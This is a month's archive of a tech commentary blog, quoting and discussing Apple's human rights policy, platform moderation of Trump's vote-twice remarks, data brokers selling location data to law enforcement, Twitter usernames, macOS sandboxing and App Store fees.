Month: September 2020

Patrick McGee, Financial Times:

Apple has for the first time published a human rights policy that commits to respecting “freedom of information and expression”, following years of criticism that it bows to demands from Beijing and carries out censorship in mainland China, Tibet, Xinjiang and Hong Kong.

[…]

But it does not mention any particular country, nor does it refer to high-profile dilemmas like what to do when China, the world’s largest smartphone market, asks it to ban apps that help users evade censorship and surveillance.

The Apple policy merely states: “Where national law and international human rights standards differ, we follow the higher standard. Where they are in conflict, we respect national law while seeking to respect the principles of internationally recognised human rights.” 

Apple’s policy (PDF) is short — just four pages — and easily readable. Here’s the salient paragraph on handling conflicts between human rights and local laws that infringe upon them:

We work every day to make quality products, including content and services, available to our users in a way that respects their human rights. We’re required to comply with local laws, and at times there are complex issues about which we may disagree with governments and other stakeholders on the right path forward. With dialogue, and a belief in the power of engagement, we try to find the solution that best serves our users — their privacy, their ability to express themselves, and their access to reliable information and helpful technology.

A report last month by Wayne Ma for the Information explored a number of ways Apple has managed to work around the legal requirements imposed by, in particular, the Chinese government. The App Store has generally been allowed more leash and less scrutiny than other app marketplaces; iMessage and FaceTime are allowed to operate encrypted and without government interference; Apple has not made its source code available to authorities. Ma also noted a number of instances where Apple has responded to Chinese government enforcement by disabling a feature or shutting down a store rather than complying.

However, the best summary of that report is not so much that Apple is carefully negotiating its position in China as it is that these are exemptions that the government is eager to crack down on. That is certainly made much easier thanks to Apple’s centralized approach. At the same time, that approach potentially gives it increased leverage against measures with which it disagrees.

Molly Blackall, the Guardian:

Good morning. Donald Trump suggested on Wednesday that people in North Carolina should vote twice in the November election, casting ballots both in person and by mail, despite this being a crime. When asked about the security of mail-in votes in an interview with WECT-TV, Trump said: “Let them send it in and let them go vote. And if the system is as good as they say it is then obviously they won’t be able to vote” in person.

Taylor Hatmaker, TechCrunch:

President Trump’s recent suggestion that North Carolina voters should cast multiple ballots has run afoul of Twitter’s election integrity rules. In a series of tweets Thursday morning, the president elaborated on previous statements in which he encouraged Americans to vote twice to “check” vote-by-mail systems.

[…]

Twitter added a “public interest notice” to two tweets related to those comments Thursday, citing its rules around civic and election integrity. The tweets violated the rules “specifically for encouraging people to engage in a behavior that could undermine the integrity of their individual vote,” according to Twitter spokesperson Nick Pacilio. Twitter has limited the reach of those tweets and restricted its likes, replies and retweets without comment.

[…]

Facebook added its own fact-checking notice to the same statement that Twitter deemed in violation of that platform’s rules. Now, a label at the bottom of Trump’s Facebook post contradicts the president’s suggestion that Americans try to vote twice to make sure “the mail in system worked properly.”

Charlie Warzel, New York Times:

Reading Mr. Zuckerberg’s election security blog post reminded me of a line from a seminal 2017 article by the journalist Max Read. Three years ago, Mr. Read was struck by a similar pledge from Mr. Zuckerberg to “ensure the integrity” of the German elections. The commitment was admirable, he wrote, but also a tacit admission of Facebook’s immense power. “It’s a declaration that Facebook is assuming a level of power at once of the state and beyond it, as a sovereign, self-regulating, suprastate entity within which states themselves operate.”

[…]

But what does it say that one of those institutions charged with protecting democracy is, itself, structured more like a dictatorship?

One of the unique traits of this era of history that I am not entirely thrilled about is that the prospect of entrusting the electoral integrity of a superpower, in part, to the corporate guidance of a thirty-six-year-old guy keeping in check the deranged mouth farts of an ascended reality television host who is desperate to distract from the one thousand Americans dying daily from a pandemic that, while not by any means resolved anywhere, has at least been taken seriously by world leaders who value human life more than, say, their golf game.

No matter how much the leadership at Facebook and Twitter relishes their global influence, I am sure that there is a small part of the minds of Mark Zuckerberg and Jack Dorsey that wishes things were simpler — that they could rewind to ten years ago, when the biggest Facebook controversy was how much work time was being wasted playing Farmville. That would be easier than figuring out how to handle the conspiracy theories of the U.S. president. I hope that both companies have plans in place for various election day situations. It seems pretty likely that, regardless of the result, this president will not be clear, direct, or honest. Why would he start now?

There is a remarkable series of stories that Joseph Cox of Motherboard has been reporting over the past couple of months, describing the ways location data, IP addresses, and other private information is being sold to vendors and, eventually, law enforcement. I think these articles are best presented together, for the fullest context.

Here’s the first — police are purchasing illegally-obtained website data through intermediaries:

Hackers break into websites, steal information, and then publish that data all the time, with other hackers or scammers then using it for their own ends. But breached data now has another customer: law enforcement.

Some companies are selling government agencies access to data stolen from websites in the hope that it can generate investigative leads, with the data including passwords, email addresses, IP addresses, and more.

Motherboard obtained webinar slides by a company called SpyCloud presented to prospective customers. In that webinar, the company claimed to “empower investigators from law enforcement agencies and enterprises around the world to more quickly and efficiently bring malicious actors to justice.” The slides were shared by a source who was concerned about law enforcement agencies buying access to hacked data. SpyCloud confirmed the slides were authentic to Motherboard.

Here’s another — the United States Secret Service purchased a license to Babel Street’s Locate X. You may remember that name from a story that appeared in the Wall Street Journal last month, which I covered, that showed multiple U.S. government agencies had contracts with private location tracking companies. Cox:

The Secret Service paid for a product that gives the agency access to location data generated by ordinary apps installed on peoples’ smartphones, an internal Secret Service document confirms.

The sale highlights the issue of law enforcement agencies buying information, and in particular location data, that they would ordinarily need a warrant or court order to obtain. This contract relates to the sale of Locate X, a product from a company called Babel Street.

Finally, published yesterday, a story about a private spy company that buys location data:

A threat intelligence firm called HYAS, a private company that tries to prevent or investigates hacks against its clients, is buying location data harvested from ordinary apps installed on peoples’ phones around the world, and using it to unmask hackers. The company is a business, not a law enforcement agency, and claims to be able to track people to their “doorstep.”

[…]

Motherboard found several location data companies that list HYAS in their privacy policies. One of those is X-Mode, a company that plants its own code into ordinary smartphone apps to then harvest location information. An X-Mode spokesperson told Motherboard in an email that the company’s data collecting code, or software development kit (SDK), is in over 400 apps and gathers information on 60 million global monthly users on average. X-Mode also develops some of its own apps which use location data, including parental monitoring app PlanC and fitness tracker Burn App.

Many of these apps are distributed by a developer called Launch LLC. So you think you’re downloading a simple app from some no-name developer, and it’s actually from this X-Mode data brokerage company that sells your data to HYAS which, in turn, distributes it to law enforcement and intelligence agencies to mine without a warrant.

The fact that these marketplaces are even possible is absurd and outrageous. A lack of strict regulations for the collection and use of personal data — particularly in the United States, given the number of tech companies based there — puts everyone at risk.

Just a couple of months ago, a massive Oracle BlueKai database was found to be leaking data from an estimated 1% of all traffic on the web. A report released last week indicated that just a handful of often-visited websites are needed to reliably “fingerprint” someone, and dozens of companies have the potential to do so.

We constantly generate so much private data on the smartphones we carry everywhere. Yet the collection, use, and resale of that data is basically unregulated. The scale of it is unknown, since many of the organizations responsible go out of their way to hide their activities. I am sure that all of this has the potential to catch criminals, but at what cost?

Yesterday, the U.S. Court of Appeals for the Ninth Circuit unanimously confirmed that the NSA’s bulk collection of Americans’ phone records was illegal, and found no evidence that it ever found or convicted a single terrorist. But, even if it had helped, the program would still have been illegal because bulk surveillance is antithetical to a healthy democracy. If anything, this decision demonstrated that federal agencies are more constrained than private companies in their ability to collect information like this. That makes sense — the state should not be spying on citizens — but Cox’s reporting shows that the private sector has provided a convenient workaround.

Perhaps it is possible to update the law to require a warrant for surveillance by proxy, and for it to be more targeted, but it is highly unethical to be collecting this much information in the first place for the purposes of stockpiling and bulk sales. This circumstance should not be possible — even in theory. That is not for the purposes of making legitimate investigations harder, but to ensure privacy and security for everyone. The software we use should not be snitching our location to some two-bit private intelligence firm for resale to whomever they determine to be an agreeable customer. You might be comfortable with the U.S. Secret Service buying access to your location; maybe you’re fine with other law enforcement agencies and private companies that may have similar contracts. But, sooner or later, I am certain we will find out that some disagreeable entity — maybe a company that behaves unethically, or maybe some authoritarian state — also tracks people around the world. Then what? Stopping this data brokerage industry is not paranoia, it is pragmatic.

Darius Kazemi (via Andy Baio):

There’s a common belief that Twitter accounts with usernames like @jsmith12345678 must be bots, or trolls, or otherwise nefarious actors.

The thing is, since at least as far back as December 2017, the Twitter signup process has not allowed you to choose your own username! It instead gives you a name based on your first and last name, plus eight numbers on the end. You aren’t prompted to pick a more distinctive username after that, and you can change it but you need to figure out how to do it yourself.

One of the great mysteries of the last four years is how eager Twitter users are to call each other a “bot”. Another mystery is how robot-like many of the accounts on Twitter appear to be. There are common traits: they react almost impossibly quickly to tweets from politicians and journalists alike, they use loads of emoji in their screen name, and stuff their bios full of hashtags and the phrase “no DMs”. They often ride dangerously close to a parody of whatever party line they toe and, consequently, post nothing of substance. They also tend to swarm hashtags and specific phrases in order to get topics to trend.

So, I have to wonder: are these accounts truly some form of scripted entity, or are they just morons with fast fingers? It sure is hard to tell.

Update: Kylie Brakeman’s take is far better than mine.

Brent Simmons:

NetNewsWire lets you set the default RSS reader to itself or any other RSS reader. It’s an important feature.

Now that we’re sandboxing the app, we’re losing that feature, as LSSetDefaultHandlerForURLScheme is apparently disallowed for sandboxed apps.

Michael Tsai:

This is a good example of how the sandbox still feels half-baked. 9 years later, it’s not documented that this function doesn’t work in sandboxed apps. There’s no replacement API, e.g. that asks the user whether it’s OK to change the URL handler. The system UI for setting the preferred RSS app has been removed, so the user can’t do it manually.

This limitation kind of makes sense if you squint a bit: sandboxing puts a wall around what an app knows about its external environment, and an app ignorant of everything else it shares a processor with cannot possibly configure defaults for the rest of the machine. Some of the people replying to Simmons suggest creating a utility “helper” app, distributed separately, to set a default URL handler for feed URL schemes — an almost comically inefficient workaround. I like sandboxing in principle, but stuff like this makes its MacOS implementation feel thoughtless and shallow.

Oliver Reichenstein, writing on the iA blog:

Ads are digital goods. What else are ads? Spiritual goods? They are the digital good. They are what is driving the digital economy in the first place! And, yes, Facebook, Instagram, Twitter, and so on do have direct transactions built into the apps. And, no, they do not pay any fees to Apple for these in-app transactions.

Apple keeps repeating that the rules are the same for all, but they are not. The top ten apps do sell digital goods and only two of the top ten apps pay Apple. Netflix and Amazon. Netflix and Amazon have found a backdoor to avoid the 30% tax. One difference between the big apps and those who pay Apple is that they charge consumers. The top 5 apps are ad-based, feed on our privacy, and charge companies for it. You may have noticed that the big ones who are charged, companies like Netflix, Amazon, and Spotify also happen to be direct competitors of Apple.

Apple also has a small ads business with the App Store, thereby kind-of-sort-of competing with Google — but point taken.

This is not in strict opposition to the App Store guidelines. Buying ads does not “unlock features or functionality within [an] app” any more than, say, using a banking app to send or receive money. Neither uses in-app purchases because it would not make sense. But that is an awful thin line that, as Reichenstein writes, benefits ad-supported anti-privacy apps over those that have a one-time or monthly cost.